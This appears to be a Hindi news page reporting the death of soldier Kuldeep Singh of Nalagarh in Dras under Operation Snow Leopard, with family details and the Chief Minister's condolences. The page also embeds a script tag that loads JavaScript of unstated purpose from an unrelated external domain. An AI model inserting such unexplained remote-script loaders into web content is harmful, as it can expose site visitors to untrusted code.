<p>सोलन जिला के नालागढ़ में एक जवान ड्यूटी के दौरान शहीद हो गया। यहां जगतपुर पंचायत के गांव जगराला के 41 वर्षीय बटालियन हवलदार मेजर कुलदीप सिंह लद्दाख के द्रास में शहीद हो गए हैं। कुलदीप सिंह ने ऑप्रेशन स्नो लैपर्ड के तहत शहादत पाई है। शहीद कुलदीप सिंह के दादा दौला सिंह भी स्वतंत्रता सेनानी थे। कुलदीप सिंह की शहादत पर नालागढ़ क्षेत्र में गम का माहौल है।</p>
<p>जानकारी अनुसार 10 जुलाई, 1999 को सेना में भर्ती हुए कुलदीप सिंह में बचपन से ही देश सेवा का जज्बा था। उनके बड़े भाई सुरेंद्र सिंह बीएसएफ से सेवानिवृत्त हुए हैं। इसके अलावा चचेरे भाई भी सेना भी तैनात हैं। 79 मीडियम आर्टिलरी रैजीमैंट में तैनात कुलदीप सिंह की पार्थिव देह शनिवार को पैतृक गांव पहुंचने की उम्मीद है।</p>
<p>मेजर कुलदीप सिंह की शहादत पर मुख्यमंत्री ने दुःख व्यक्त किया है। उन्होंने ट्वीट कर कहा कि द्रास में सेवाएं देते हुए भारतीय सेना का वीर जवान एवं वीरभूमि हिमाचल के नालागढ़ का सपूत कुलदीप सिंह के शहीद होने वाली खबर अत्यंत दुःखद है। ईश्वर दिवंगत आत्मा को शांति व शोकग्रस्त परिवार को संबल प्रदान करें। हिमाचल को वीर जवान कुलदीप की शहादत पर गर्व है।</p>
<p><img src=”/media/gallery/images/image(1976).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
Indo-China border security concerns: हिमाचल प्रदेश के किन्नौर जिले में इंडो-चाइना बॉर्डर पर चीन…
Wazir Ram Singh Pathania: कांगड़ा जिले के नूरपुर उपमंडल में शनिवार को राज्यपाल ने…
रैत में अंडर-19 राज्य स्तरीय खेलकूद प्रतियोगिता का समापन: शिक्षा मंत्री ने विजेताओं को किया…
Political Tension Escalates: हिमाचल प्रदेश में कांग्रेस और भाजपा के बीच आरोप-प्रत्यारोप का सिलसिला…
Shimla: मुख्यमंत्री सुखविंदर सिंह सुक्खू ने आज IGMC शिमला में टर्शरी कैंसर केयर सेंटर का…
एमएमयू इकाई 2 बंजार के द्वारा राजकीय वरिष्ठ माध्यमिक पाठशाला कनौन में किशोरियों को सामाजिक…